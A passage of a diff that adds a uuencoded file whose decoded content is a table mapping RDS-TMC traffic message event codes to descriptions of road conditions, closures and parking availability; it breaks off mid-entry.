+M;&]W('9E:&EC;&4H<RDL(&1A;F=E<B(["B`@("`D179E;G1;,3<S-5T@/2`B
+M*%$I('1R86-K+6QA>6EN9R!V96AI8VQE*',I+"!D86YG97(B.PH@("`@)$5V
+M96YT6S$W,S9=(#T@(BA1*2!V96AI8VQE*',I(&-A<G)Y:6YG(&AA>F%R9&]U
+M<R!M871E<FEA;',N($1A;F=E<B(["B`@("`D179E;G1;,3<S-UT@/2`B*%$I
+M(&-O;G9O>2AS*2P@9&%N9V5R(CL*("`@("1%=F5N=%LQ-S,X72`]("(H42D@
+M;6EL:71A<GD@8V]N=F]Y*',I+"!D86YG97(B.PH@("`@)$5V96YT6S$W,SE=
+M(#T@(BA1*2!O=F5R:&5I9VAT(&QO860H<RDL(&1A;F=E<B(["B`@("`D179E
+M;G1;,3<T,%T@/2`B86)N;W)M86P@;&]A9"!C875S:6YG('-L;W<@=')A9F9I
+M8RX@1&5L87ES("A1*2(["B`@("`D179E;G1;,3<T,5T@/2`B8V]N=F]Y(&-A
+M=7-I;F<@<VQO=R!T<F%F9FEC+B!$96QA>7,@*%$I(CL*("`@("1%=F5N=%LQ
+M-S4Q72`]("(H42D@86)N;W)M86P@;&]A9"AS*2(["B`@("`D179E;G1;,3<U
+M,ET@/2`B*%$I('=I9&4@;&]A9"AS*2(["B`@("`D179E;G1;,3<U,UT@/2`B
+M*%$I(&QO;F<@;&]A9"AS*2(["B`@("`D179E;G1;,3<U-%T@/2`B*%$I('-L
+M;W<@=F5H:6-L92AS*2(["B`@("`D179E;G1;,3<U-5T@/2`B*%$I(&-O;G9O
+M>2AS*2(["B`@("`D179E;G1;,3<U-ET@/2`B86)N;W)M86P@;&]A9"X@1&5L
+M87ES("A1*2(["B`@("`D179E;G1;,3<U-UT@/2`B86)N;W)M86P@;&]A9"X@
+M1&5L87ES("A1*2!E>'!E8W1E9"(["B`@("`D179E;G1;,3<U.%T@/2`B86)N
+M;W)M86P@;&]A9"X@3&]N9R!D96QA>7,@*%$I(CL*("`@("1%=F5N=%LQ-S4Y
+M72`](")C;VYV;WD@8V%U<VEN9R!D96QA>7,@*%$I(CL*("`@("1%=F5N=%LQ
+M-S8P72`](")C;VYV;WDN($1E;&%Y<R`H42D@97AP96-T960B.PH@("`@)$5V
+M96YT6S$W-C%=(#T@(F-O;G9O>2!C875S:6YG(&QO;F<@9&5L87ES("A1*2([
+M"B`@("`D179E;G1;,3<V,ET@/2`B97AC97!T:6]N86P@;&]A9"!W87)N:6YG
+M(&-L96%R960B.PH@("`@)$5V96YT6S$W-C-=(#T@(FUE<W-A9V4@8V%N8V5L
+M;&5D(CL*("`@("1%=F5N=%LQ-S8T72`]("(H42D@=')A8VLM;&%Y:6YG('9E
+M:&EC;&4H<RDB.PH@("`@)$5V96YT6S$W-C5=(#T@(BA1*2!V96AI8VQE*',I
+M(&-A<G)Y:6YG(&AA>F%R9&]U<R!M871E<FEA;',B.PH@("`@)$5V96YT6S$W
+M-C9=(#T@(BA1*2!M:6QI=&%R>2!C;VYV;WDH<RDB.PH@("`@)$5V96YT6S$W
+M-C==(#T@(BA1*2!A8FYO<FUA;"!L;V%D*',I+B!.;R!O=F5R=&%K:6YG(CL*
+M("`@("1%=F5N=%LQ-S8X72`](")696AI8VQE<R!C87)R>6EN9R!H87IA<F1O
+M=7,@;6%T97)I86QS(&AA=F4@=&\@<W1O<"!A="!N97AT('-A9F4@<&QA8V4A
+M(CL*("`@("1%=F5N=%LQ-S8Y72`](")H87IA<F1O=7,@;&]A9"!W87)N:6YG
+M(&-L96%R960B.PH@("`@)$5V96YT6S$W-S!=(#T@(F-O;G9O>2!C;&5A<F5D
+M(CL*("`@("1%=F5N=%LQ-S<Q72`](")W87)N:6YG(&-L96%R960B.PH@("`@
+M)$5V96YT6S$X,#%=(#T@(FQA;F4@8V]N=')O;"!S:6=N<R!N;W0@=V]R:VEN
+M9R(["B`@("`D179E;G1;,3@P,ET@/2`B96UE<F=E;F-Y('1E;&5P:&]N97,@
+M;F]T('=O<FMI;F<B.PH@("`@)$5V96YT6S$X,#-=(#T@(F5M97)G96YC>2!T
+M96QE<&AO;F4@;G5M8F5R(&YO="!W;W)K:6YG(CL*("`@("1%=F5N=%LQ.#`T
+M72`]("(H42!S971S(&]F*2!T<F%F9FEC(&QI9VAT<R!N;W0@=V]R:VEN9R([
+M"B`@("`D179E;G1;,3@P-5T@/2`B*%$@<V5T<R!O9BD@=')A9F9I8R!L:6=H
+M=',@=V]R:VEN9R!I;F-O<G)E8W1L>2(["B`@("`D179E;G1;,3@P-ET@/2`B
+M;&5V96P@8W)O<W-I;F<@9F%I;'5R92(["B`@("`D179E;G1;,3@P-UT@/2`B
+M*%$@<V5T<R!O9BD@=')A9F9I8R!L:6=H=',@;F]T('=O<FMI;F<N(%-T871I
+M;VYA<GD@=')A9F9I8R(["B`@("`D179E;G1;,3@P.%T@/2`B*%$@<V5T<R!O
+M9BD@=')A9F9I8R!L:6=H=',@;F]T('=O<FMI;F<N($1A;F=E<B!O9B!S=&%T
+M:6]N87)Y('1R869F:6,B.PH@("`@)$5V96YT6S$X,#E=(#T@(BA1('-E=',@
+M;V8I('1R869F:6,@;&EG:'1S(&YO="!W;W)K:6YG+B!1=65U:6YG('1R869F
+M:6,B.PH@("`@)$5V96YT6S$X,3!=(#T@(BA1('-E=',@;V8I('1R869F:6,@
+M;&EG:'1S(&YO="!W;W)K:6YG+B!$86YG97(@;V8@<75E=6EN9R!T<F%F9FEC
+M(CL*("`@("1%=F5N=%LQ.#$Q72`]("(H42!S971S(&]F*2!T<F%F9FEC(&QI
+M9VAT<R!N;W0@=V]R:VEN9RX@4VQO=R!T<F%F9FEC(CL*("`@("1%=F5N=%LQ
+M.#$R72`]("(H42!S971S(&]F*2!T<F%F9FEC(&QI9VAT<R!N;W0@=V]R:VEN
+M9RX@4VQO=R!T<F%F9FEC(&5X<&5C=&5D(CL*("`@("1%=F5N=%LQ.#$S72`]
+M("(H42!S971S(&]F*2!T<F%F9FEC(&QI9VAT<R!N;W0@=V]R:VEN9RX@2&5A
+M=GD@=')A9F9I8R(["B`@("`D179E;G1;,3@Q-%T@/2`B*%$@<V5T<R!O9BD@
+M=')A9F9I8R!L:6=H=',@;F]T('=O<FMI;F<N($AE879Y('1R869F:6,@97AP
+M96-T960B.PH@("`@)$5V96YT6S$X,35=(#T@(BA1('-E=',@;V8I('1R869F
+M:6,@;&EG:'1S(&YO="!W;W)K:6YG+B!4<F%F9FEC(&9L;W=I;F<@9G)E96QY
+M(CL*("`@("1%=F5N=%LQ.#$V72`]("(H42!S971S(&]F*2!T<F%F9FEC(&QI
+M9VAT<R!N;W0@=V]R:VEN9RX@5')A9F9I8R!B=6EL9&EN9R!U<"(["B`@("`D
+M179E;G1;,3@Q-UT@/2`B=')A9F9I8R!L:6=H=',@;F]T('=O<FMI;F<N($1E
+M;&%Y<R`H42DB.PH@("`@)$5V96YT6S$X,3A=(#T@(G1R869F:6,@;&EG:'1S
+M(&YO="!W;W)K:6YG+B!$96QA>7,@*%$I(&5X<&5C=&5D(CL*("`@("1%=F5N
+M=%LQ.#$Y72`](")T<F%F9FEC(&QI9VAT<R!N;W0@=V]R:VEN9RX@3&]N9R!D
+M96QA>7,@*%$I(CL*("`@("1%=F5N=%LQ.#(P72`](")L979E;"!C<F]S<VEN
+M9R!F86EL=7)E+B!3=&%T:6]N87)Y('1R869F:6,B.PH@("`@)$5V96YT6S$X
+M,C%=(#T@(FQE=F5L(&-R;W-S:6YG(&9A:6QU<F4N($1A;F=E<B!O9B!S=&%T
+M:6]N87)Y('1R869F:6,B.PH@("`@)$5V96YT6S$X,C)=(#T@(FQE=F5L(&-R
+M;W-S:6YG(&9A:6QU<F4N(%%U975I;F<@=')A9F9I8R(["B`@("`D179E;G1;
+M,3@R,UT@/2`B;&5V96P@8W)O<W-I;F<@9F%I;'5R92X@1&%N9V5R(&]F('%U
+M975I;F<@=')A9F9I8R(["B`@("`D179E;G1;,3@R-%T@/2`B;&5V96P@8W)O
+M<W-I;F<@9F%I;'5R92X@4VQO=R!T<F%F9FEC(CL*("`@("1%=F5N=%LQ.#(U
+M72`](")L979E;"!C<F]S<VEN9R!F86EL=7)E+B!3;&]W('1R869F:6,@97AP
+M96-T960B.PH@("`@)$5V96YT6S$X,C9=(#T@(FQE=F5L(&-R;W-S:6YG(&9A
+M:6QU<F4N($AE879Y('1R869F:6,B.PH@("`@)$5V96YT6S$X,C==(#T@(FQE
+M=F5L(&-R;W-S:6YG(&9A:6QU<F4N($AE879Y('1R869F:6,@97AP96-T960B
+M.PH@("`@)$5V96YT6S$X,CA=(#T@(FQE=F5L(&-R;W-S:6YG(&9A:6QU<F4N
+M(%1R869F:6,@9FQO=VEN9R!F<F5E;'DB.PH@("`@)$5V96YT6S$X,CE=(#T@
+M(FQE=F5L(&-R;W-S:6YG(&9A:6QU<F4N(%1R869F:6,@8G5I;&1I;F<@=7`B
+M.PH@("`@)$5V96YT6S$X,S!=(#T@(FQE=F5L(&-R;W-S:6YG(&9A:6QU<F4N
+M($1E;&%Y<R`H42DB.PH@("`@)$5V96YT6S$X,S%=(#T@(FQE=F5L(&-R;W-S
+M:6YG(&9A:6QU<F4N($1E;&%Y<R`H42D@97AP96-T960B.PH@("`@)$5V96YT
+M6S$X,S)=(#T@(FQE=F5L(&-R;W-S:6YG(&9A:6QU<F4N($QO;F<@9&5L87ES
+M("A1*2(["B`@("`D179E;G1;,3@S,UT@/2`B96QE8W1R;VYI8R!S:6=N<R!R
+M97!A:7)E9"(["B`@("`D179E;G1;,3@S-%T@/2`B96UE<F=E;F-Y(&-A;&P@
+M9F%C:6QI=&EE<R!R97-T;W)E9"(["B`@("`D179E;G1;,3@S-5T@/2`B=')A
+M9F9I8R!S:6=N86QS(')E<&%I<F5D(CL*("`@("1%=F5N=%LQ.#,V72`](")L
+M979E;"!C<F]S<VEN9R!N;W<@=V]R:VEN9R!N;W)M86QL>2(["B`@("`D179E
+M;G1;,3@S-UT@/2`B;65S<V%G92!C86YC96QL960B.PH@("`@)$5V96YT6S$X
+M,SA=(#T@(FQA;F4@8V]N=')O;"!S:6=N<R!W;W)K:6YG(&EN8V]R<F5C=&QY
+M(CL*("`@("1%=F5N=%LQ.#,Y72`](")L86YE(&-O;G1R;VP@<VEG;G,@;W!E
+M<F%T:6YG(CL*("`@("1%=F5N=%LQ.#0P72`](")V87)I86)L92!M97-S86=E
+M('-I9VYS(&YO="!W;W)K:6YG(CL*("`@("1%=F5N=%LQ.#0Q72`](")V87)I
+M86)L92!M97-S86=E('-I9VYS('=O<FMI;F<@:6YC;W)R96-T;'DB.PH@("`@
+M)$5V96YT6S$X-#)=(#T@(G9A<FEA8FQE(&UE<W-A9V4@<VEG;G,@;W!E<F%T
+M:6YG(CL*("`@("1%=F5N=%LQ.#0S72`]("(H42!S971S(&]F*2!R86UP(&-O
+M;G1R;VP@<VEG;F%L<R!N;W0@=V]R:VEN9R(["B`@("`D179E;G1;,3@T-%T@
+M/2`B*%$@<V5T<R!O9BD@<F%M<"!C;VYT<F]L('-I9VYA;',@=V]R:VEN9R!I
+M;F-O<G)E8W1L>2(["B`@("`D179E;G1;,3@T-5T@/2`B*%$@<V5T<R!O9BD@
+M=&5M<&]R87)Y('1R869F:6,@;&EG:'1S(&YO="!W;W)K:6YG(CL*("`@("1%
+M=F5N=%LQ.#0V72`]("(H42!S971S(&]F*2!T96UP;W)A<GD@=')A9F9I8R!L
+M:6=H=',@=V]R:VEN9R!I;F-O<G)E8W1L>2(["B`@("`D179E;G1;,3@T-UT@
+M/2`B=')A9F9I8R!S:6=N86P@8V]N=')O;"!C;VUP=71E<B!N;W0@=V]R:VEN
+M9R(["B`@("`D179E;G1;,3@T.%T@/2`B=')A9F9I8R!S:6=N86P@=&EM:6YG
+M<R!C:&%N9V5D(CL*("`@("1%=F5N=%LQ.#0Y72`](")T=6YN96P@=F5N=&EL
+M871I;VX@;F]T('=O<FMI;F<B.PH@("`@)$5V96YT6S$X-3!=(#T@(FQA;F4@
+M8V]N=')O;"!S:6=N<R!N;W0@=V]R:VEN9RX@1&%N9V5R(CL*("`@("1%=F5N
+M=%LQ.#4Q72`](")T96UP;W)A<GD@=VED=&@@;&EM:70@*%$I(CL*("`@("1%
+M=F5N=%LQ.#4R72`](")T96UP;W)A<GD@=VED=&@@;&EM:70@;&EF=&5D(CL*
+M("`@("1%=F5N=%LQ.#4T72`](")T<F%F9FEC(')E9W5L871I;VYS(&AA=F4@
+M8F5E;B!C:&%N9V5D(CL*("`@("1%=F5N=%LQ.#4U72`](")L97-S('1H86X@
+M<&%R:VEN9R!S<&%C97,@879A:6QA8FQE(CL*("`@("1%=F5N=%LQ.#4V72`]
+M(")N;R!P87)K:6YG(&EN9F]R;6%T:6]N(&%V86EL86)L92`H=6YT:6P@42DB
+M.PH@("`@)$5V96YT6S$X-3==(#T@(FUE<W-A9V4@8V%N8V5L;&5D(CL*("`@
+M("1%=F5N=%LQ.#8Q72`](")T96UP;W)A<GD@:&5I9VAT(&QI;6ET("A1*2([
+M"B`@("`D179E;G1;,3@V,ET@/2`B=&5M<&]R87)Y(&AE:6=H="!L:6UI="!L
+M:69T960B.PH@("`@)$5V96YT6S$X-C1=(#T@(FQA;F4@8V]N=')O;"!S:6=N
+M<R!W;W)K:6YG(&EN8V]R<F5C=&QY+B!$86YG97(B.PH@("`@)$5V96YT6S$X
+M-C5=(#T@(F5M97)G96YC>2!T96QE<&AO;F5S(&]U="!O9B!O<F1E<BX@17AT
+M<F$@<&]L:6-E('!A=')O;',@:6X@;W!E<F%T:6]N(CL*("`@("1%=F5N=%LQ
+M.#8V72`](")E;65R9V5N8WD@=&5L97!H;VYE<R!O=70@;V8@;W)D97(N($EN
+M(&5M97)G96YC>2P@=V%I="!F;W(@<&]L:6-E('!A=')O;"(["B`@("`D179E
+M;G1;,3@V-UT@/2`B*%$@<V5T<R!O9BD@=')A9F9I8R!L:6=H=',@;F]T('=O
+M<FMI;F<N($1A;F=E<B(["B`@("`D179E;G1;,3@V.%T@/2`B=')A9F9I8R!L
+M:6=H=',@=V]R:VEN9R!I;F-O<G)E8W1L>2X@1&5L87ES("A1*2(["B`@("`D
+M179E;G1;,3@V.5T@/2`B=')A9F9I8R!L:6=H=',@=V]R:VEN9R!I;F-O<G)E
+M8W1L>2X@1&5L87ES("A1*2!E>'!E8W1E9"(["B`@("`D179E;G1;,3@W,%T@
+M/2`B=')A9F9I8R!L:6=H=',@=V]R:VEN9R!I;F-O<G)E8W1L>2X@3&]N9R!D
+M96QA>7,@*%$I(CL*("`@("1%=F5N=%LQ.#<Q72`](")T96UP;W)A<GD@87AL
+M92!L;V%D(&QI;6ET("A1*2(["B`@("`D179E;G1;,3@W,ET@/2`B=&5M<&]R
+M87)Y(&=R;W-S('=E:6=H="!L:6UI="`H42DB.PH@("`@)$5V96YT6S$X-S-=
+M(#T@(G1E;7!O<F%R>2!G<F]S<R!W96EG:'0@;&EM:70@;&EF=&5D(CL*("`@
+M("1%=F5N=%LQ.#<T72`](")T96UP;W)A<GD@87AL92!W96EG:'0@;&EM:70@
+M;&EF=&5D(CL*("`@("1%=F5N=%LQ.#<U72`]("(H42!S971S(&]F*2!T<F%F
+M9FEC(&QI9VAT<R!W;W)K:6YG(&EN8V]R<F5C=&QY+B!$86YG97(B.PH@("`@
+M)$5V96YT6S$X-S9=(#T@(G1E;7!O<F%R>2!T<F%F9FEC(&QI9VAT<R!N;W0@
+M=V]R:VEN9RX@1&5L87ES("A1*2(["B`@("`D179E;G1;,3@W-UT@/2`B=&5M
+M<&]R87)Y('1R869F:6,@;&EG:'1S(&YO="!W;W)K:6YG+B!$96QA>7,@*%$I
+M(&5X<&5C=&5D(CL*("`@("1%=F5N=%LQ.#<X72`](")T96UP;W)A<GD@=')A
+M9F9I8R!L:6=H=',@;F]T('=O<FMI;F<N($QO;F<@9&5L87ES("A1*2(["B`@
+M("`D179E;G1;,3@W.5T@/2`B*%$@<V5T<R!O9BD@=&5M<&]R87)Y('1R869F
+M:6,@;&EG:'1S(&YO="!W;W)K:6YG+B!$86YG97(B.PH@("`@)$5V96YT6S$X
+M.#!=(#T@(G1R869F:6,@<VEG;F%L(&-O;G1R;VP@8V]M<'5T97(@;F]T('=O
+M<FMI;F<N($1E;&%Y<R`H42DB.PH@("`@)$5V96YT6S$X.#%=(#T@(G1E;7!O
+M<F%R>2!L96YG=&@@;&EM:70@*%$I(CL*("`@("1%=F5N=%LQ.#@R72`](")T
+M96UP;W)A<GD@;&5N9W1H(&QI;6ET(&QI9G1E9"(["B`@("`D179E;G1;,3@X
+M,UT@/2`B;65S<V%G92!C86YC96QL960B.PH@("`@)$5V96YT6S$X.#1=(#T@
+M(G1R869F:6,@<VEG;F%L(&-O;G1R;VP@8V]M<'5T97(@;F]T('=O<FMI;F<N
+M($1E;&%Y<R`H42D@97AP96-T960B.PH@("`@)$5V96YT6S$X.#5=(#T@(G1R
+M869F:6,@<VEG;F%L(&-O;G1R;VP@8V]M<'5T97(@;F]T('=O<FMI;F<N($QO
+M;F<@9&5L87ES("A1*2(["B`@("`D179E;G1;,3@X-ET@/2`B;F]R;6%L('!A
+M<FMI;F<@<F5S=')I8W1I;VYS(&QI9G1E9"(["B`@("`D179E;G1;,3@X-UT@
+M/2`B<W!E8VEA;"!P87)K:6YG(')E<W1R:6-T:6]N<R!I;B!F;W)C92(["B`@
+M("`D179E;G1;,3@X.%T@/2`B,3`E(&9U;&PB.PH@("`@)$5V96YT6S$X.#E=
+M(#T@(C(P)2!F=6QL(CL*("`@("1%=F5N=%LQ.#DP72`]("(S,"4@9G5L;"([
+M"B`@("`D179E;G1;,3@Y,5T@/2`B-#`E(&9U;&PB.PH@("`@)$5V96YT6S$X
+M.3)=(#T@(C4P)2!F=6QL(CL*("`@("1%=F5N=%LQ.#DS72`]("(V,"4@9G5L
+M;"(["B`@("`D179E;G1;,3@Y-%T@/2`B-S`E(&9U;&PB.PH@("`@)$5V96YT
+M6S$X.35=(#T@(C@P)2!F=6QL(CL*("`@("1%=F5N=%LQ.#DV72`]("(Y,"4@
+M9G5L;"(["B`@("`D179E;G1;,3@Y-UT@/2`B;&5S<R!T:&%N('!A<FMI;F<@
+M<W!A8V5S(&%V86EL86)L92(["B`@("`D179E;G1;,3@Y.%T@/2`B;&5S<R!T
+M:&%N('!A<FMI;F<@<W!A8V5S(&%V86EL86)L92(["B`@("`D179E;G1;,3@Y
+M.5T@/2`B;&5S<R!T:&%N('!A<FMI;F<@<W!A8V5S(&%V86EL86)L92(["B`@
+M("`D179E;G1;,3DP,%T@/2`B;&5S<R!T:&%N('!A<FMI;F<@<W!A8V5S(&%V
+M86EL86)L92(["B`@("`D179E;G1;,3DP,5T@/2`B;F5X="!D97!A<G1U<F4@
+M*%$I(CL*("`@("1%=F5N=%LQ.3`R72`](")N97AT(&1E<&%R='5R92`H42D@
+M9F]R(&AE879Y('9E:&EC;&5S(CL*("`@("1%=F5N=%LQ.3`S72`](")C87(@
+M<&%R:R`H42D@9G5L;"(["B`@("`D179E;G1;,3DP-%T@/2`B86QL(&-A<B!P
+M87)K<R`H42D@9G5L;"(["B`@("`D179E;G1;,3DP-5T@/2`B;&5S<R!T:&%N
+M("A1*2!C87(@<&%R:VEN9R!S<&%C97,@879A:6QA8FQE(CL*("`@("1%=F5N
+M=%LQ.3`V72`](")P87)K(&%N9"!R:61E('-E<G9I8V4@;W!E<F%T:6YG("AU
+M;G1I;"!1*2(["B`@("`D179E;G1;,3DP-UT@/2`B*&YU;&P@979E;G0I('MN
+M;R!E=F5N="!D97-C<FEP=&EO;BP@8G5T(&QO8V%T:6]N(&5T8RX@9VEV96X@
+M:6X@;65S<V%G97TB.PH@("`@)$5V96YT6S$Y,#A=(#T@(G-W:71C:"!Y;W5R
+M(&-A<B!R861I;R`H=&\@42DB.PH@("`@)$5V96YT6S$Y,#E=(#T@(F%L87)M
+M(&-A;&PZ(&EM<&]R=&%N="!N97<@:6YF;W)M871I;VX@;VX@=&AI<R!F<F5Q
+M=65N8WD@9F]L;&]W<R!N;W<@:6X@;F]R;6$B.PH@("`@)$5V96YT6S$Y,3!=
+M(#T@(F%L87)M('-E=#H@;F5W(&EN9F]R;6%T:6]N('=I;&P@8F4@8G)O861C
+M87-T(&)E='=E96X@=&AE<V4@=&EM97,@:6X@;F]R;6%L(CL*("`@("1%=F5N
+M=%LQ.3$Q72`](")M97-S86=E(&-A;F-E;&QE9"(["B`@("`D179E;G1;,3DQ
+M,UT@/2`B<W=I=&-H('EO=7(@8V%R(')A9&EO("AT;R!1*2(["B`@("`D179E
+M;G1;,3DQ-%T@/2`B;F\@:6YF;W)M871I;VX@879A:6QA8FQE("AU;G1I;"!1
+M*2(["B`@("`D179E;G1;,3DQ-5T@/2`B=&AI<R!M97-S86=E(&ES(&9O<B!T
+M97-T('!U<G!O<V5S(&]N;'D@*&YU;6)E<B!1*2P@<&QE87-E(&EG;F]R92([
+M"B`@("`D179E;G1;,3DQ-ET@/2`B;F\@:6YF;W)M871I;VX@879A:6QA8FQE
+M("AU;G1I;"!1*2!D=64@=&\@=&5C:&YI8V%L('!R;V)L96US(CL*("`@("1%
+M=F5N=%LQ.3$X72`](")F=6QL(CL*("`@("1%=F5N=%LQ.3(P72`](")O;FQY
+M(&$@9F5W('!A<FMI;F<@<W!A8V5S(&%V86EL86)L92(["B`@("`D179E;G1;
+M,3DR,5T@/2`B*%$I('!A<FMI;F<@<W!A8V5S(&%V86EL86)L92(["B`@("`D
+M179E;G1;,3DR,ET@/2`B97AP96-T(&-A<B!P87)K('1O(&)E(&9U;&PB.PH@
+M("`@)$5V96YT6S$Y,C-=(#T@(F5X<&5C="!N;R!P87)K:6YG('-P86-E<R!A
+M=F%I;&%B;&4B.PH@("`@)$5V96YT6S$Y,C1=(#T@(FUU;'1I('-T;W)Y(&-A
+M<B!P87)K<R!F=6QL(CL*("`@("1%=F5N=%LQ.3(U72`](")N;R!P<F]B;&5M
+M<R!T;R!R97!O<G0@=VET:"!P87)K(&%N9"!R:61E('-E<G9I8V5S(CL*("`@
+M("1%=F5N=%LQ.3(V72`](")N;R!P87)K:6YG('-P86-E<R!A=F%I;&%B;&4B
+M.PH@("`@)$5V96YT6S$Y,C==(#T@(FYO('!A<FMI;F<@*'5N=&EL(%$I(CL*
+M("`@("1%=F5N=%LQ.3(X72`](")S<&5C:6%L('!A<FMI;F<@<F5S=')I8W1I
+M;VYS(&QI9G1E9"(["B`@("`D179E;G1;,3DR.5T@/2`B=7)G96YT(&EN9F]R
+M;6%T:6]N('=I;&P@8F4@9VEV96X@*&%T(%$I(&]N(&YO<FUA;"!P<F]G<F%M
+M;64@8G)O861C87-T<R(["B`@("`D179E;G1;,3DS,%T@/2`B=&AI<R!434,M
+M<V5R=FEC92!I<R!N;W0@86-T:79E("AU;G1I;"!1*2(["B`@("`D179E;G1;
+M,3DS,5T@/2`B9&5T86EL960@:6YF;W)M871I;VX@=VEL;"!B92!G:79E;B`H
+M870@42D@;VX@;F]R;6%L('!R;V=R86UM92!B<F]A9&-A<W1S(CL*("`@("1%
+M=F5N=%LQ.3,R72`](")D971A:6QE9"!I;F9O<FUA=&EO;B!I<R!P<F]V:61E
+M9"!B>2!A;F]T:&5R(%1-0R!S97)V:6-E(CL*("`@("1%=F5N=%LQ.3,T72`]
+M(")N;R!P87)K(&%N9"!R:61E(&EN9F]R;6%T:6]N(&%V86EL86)L92`H=6YT
+M:6P@42DB.PH@("`@)$5V96YT6S$Y,SA=(#T@(G!A<FL@86YD(')I9&4@:6YF
+M;W)M871I;VX@<V5R=FEC92!R97-U;65D(CL*("`@("1%=F5N=%LQ.30P72`]
+M(")A9&1I=&EO;F%L(')E9VEO;F%L(&EN9F]R;6%T:6]N(&ES('!R;W9I9&5D
+M(&)Y(&%N;W1H97(@5$U#('-E<G9I8V4B.PH@("`@)$5V96YT6S$Y-#%=(#T@
+M(F%D9&ET:6]N86P@;&]C86P@:6YF;W)M871I;VX@:7,@<')O=FED960@8GD@
+M86YO=&AE<B!434,@<V5R=FEC92(["B`@("`D179E;G1;,3DT,ET@/2`B861D
+M:71I;VYA;"!P=6)L:6,@=')A;G-P;W)T(&EN9F]R;6%T:6]N(&ES('!R;W9I
+M9&5D(&)Y(&%N;W1H97(@5$U#('-E<G9I8V4B.PH@("`@)$5V96YT6S$Y-#-=
+M(#T@(FYA=&EO;F%L('1R869F:6,@:6YF;W)M871I;VX@:7,@<')O=FED960@
+M8GD@86YO=&AE<B!434,@<V5R=FEC92(["B`@("`D179E;G1;,3DT-%T@/2`B
+M=&AI<R!S97)V:6-E('!R;W9I9&5S(&UA:F]R(')O860@:6YF;W)M871I;VXB
+M.PH@("`@)$5V96YT6S$Y-#5=(#T@(G1H:7,@<V5R=FEC92!P<F]V:61E<R!R
+M96=I;VYA;"!T<F%V96P@:6YF;W)M871I;VXB.PH@("`@)$5V96YT6S$Y-#9=
+M(#T@(G1H:7,@<V5R=FEC92!P<F]V:61E<R!L;V-A;"!T<F%V96P@:6YF;W)M
+M871I;VXB.PH@("`@)$5V96YT6S$Y-#==(#T@(FYO(&1E=&%I;&5D(')E9VEO
+M;F%L(&EN9F]R;6%T:6]N('!R;W9I9&5D(&)Y('1H:7,@<V5R=FEC92(["B`@
+M("`D179E;G1;,3DT.%T@/2`B;F\@9&5T86EL960@;&]C86P@:6YF;W)M871I
+M;VX@<')O=FED960@8GD@=&AI<R!S97)V:6-E(CL*("`@("1%=F5N=%LQ.30Y
+M72`](")N;R!C<F]S<RUB;W)D97(@:6YF;W)M871I;VX@<')O=FED960@8GD@
+M=&AI<R!S97)V:6-E(CL*("`@("1%=F5N=%LQ.34P72`](")I;F9O<FUA=&EO
+M;B!R97-T<FEC=&5D('1O('1H:7,@87)E82(["B`@("`D179E;G1;,3DU,5T@
+M/2`B;F\@;F5W('1R869F:6,@:6YF;W)M871I;VX@879A:6QA8FQE("AU;G1I
+M;"!1*2(["B`@("`D179E;G1;,3DU,ET@/2`B;F\@<'5B;&EC('1R86YS<&]R
+M="!I;F9O<FUA=&EO;B!A=F%I;&%B;&4B.PH@("`@)$5V96YT6S$Y-3-=(#T@
+M(G1H:7,@5$U#+7-E<G9I8V4@:7,@8F5I;F<@<W5S<&5N9&5D("AA="!1*2([
+M"B`@("`D179E;G1;,3DU-%T@/2`B86-T:79E(%1-0RUS97)V:6-E('=I;&P@
+M<F5S=6UE("AA="!1*2(["B`@("`D179E;G1;,3DU-5T@/2`B<F5F97)E;F-E
+M('1O(&%U9&EO('!R;V=R86UM97,@;F\@;&]N9V5R('9A;&ED(CL*("`@("1%
+M=F5N=%LQ.34V72`](")R969E<F5N8V4@=&\@;W1H97(@5$U#('-E<G9I8V5S
+M(&YO(&QO;F=E<B!V86QI9"(["B`@("`D179E;G1;,3DU-UT@/2`B<')E=FEO
+M=7,@86YN;W5N8V5M96YT(&%B;W5T('1H:7,@;W(@;W1H97(@5$U#('-E<G9I
+M8V5S(&YO(&QO;F=E<B!V86QI9"(["B`@("`D179E;G1;,3DV,5T@/2`B86QL
+M;W<@96UE<F=E;F-Y('9E:&EC;&5S('1O('!A<W,@:6X@=&AE(&-A<G!O;VP@
+M;&%N92(["B`@("`D179E;G1;,3DV,ET@/2`B8V%R<&]O;"!L86YE(&%V86EL
+M86)L92!F;W(@86QL('9E:&EC;&5S(CL*("`@("1%=F5N=%LQ.38S72`](")P
+M;VQI8V4@9&ER96-T:6YG('1R869F:6,@=FEA('1H92!C87)P;V]L(&QA;F4B
+M.PH@("`@)$5V96YT6S$Y-S%=(#T@(G!O;&EC92!D:7)E8W1I;F<@=')A9F9I
+M8R(["B`@("`D179E;G1;,3DW,ET@/2`B8G5S;&%N92!A=F%I;&%B;&4@9F]R
+M(&%L;"!V96AI8VQE<R(["B`@("`D179E;G1;,3DW,UT@/2`B<&]L:6-E(&1I
+M<F5C=&EN9R!T<F%F9FEC('9I82!T:&4@8G5S;&%N92(["B`@("`D179E;G1;
+M,3DW-%T@/2`B86QL;W<@96UE<F=E;F-Y('9E:&EC;&5S('1O('!A<W,B.PH@
+M("`@)$5V96YT6S$Y-S==(#T@(F%L;&]W(&5M97)G96YC>2!V96AI8VQE<R!T
+M;R!P87-S(&EN('1H92!H96%V>2!V96AI8VQE(&QA;F4B.PH@("`@)$5V96YT
+M6S$Y-SA=(#T@(FAE879Y('9E:&EC;&4@;&%N92!A=F%I;&%B;&4@9F]R(&%L
+M;"!V96AI8VQE<R(["B`@("`D179E;G1;,3DW.5T@/2`B<&]L:6-E(&1I<F5C
+M=&EN9R!T<F%F9FEC('9I82!T:&4@:&5A=GD@=F5H:6-L92!L86YE(CL*("`@
+M("1%=F5N=%LQ.3@R72`](")B=7-L86YE(&-L;W-E9"(["B`@("`D179E;G1;
+M,C`P,%T@/2`B8VQO<V5D(&1U92!T;R!S;6]G(&%L97)T("AU;G1I;"!1*2([
+M"B`@("`D179E;G1;,C`P-ET@/2`B8VQO<V5D(&9O<B!V96AI8VQE<R!W:71H
+M(&QE<W,@=&AA;B!T:')E92!O8V-U<&%N=',@>VYO="!V86QI9"!F;W(@;&]R
+M<FEE<WTB.PH@("`@)$5V96YT6S(P,#==(#T@(F-L;W-E9"!F;W(@=F5H:6-L
+M97,@=VET:"!O;FQY(&]N92!O8V-U<&%N="![;F]T('9A;&ED(&9O<B!L;W)R
+M:65S?2(["B`@("`D179E;G1;,C`Q,UT@/2`B<V5R=FEC92!A<F5A(&)U<WDB
+M.PH@("`@)$5V96YT6S(P,C%=(#T@(G-E<G9I8V4@;F]T(&]P97)A=&EN9RP@
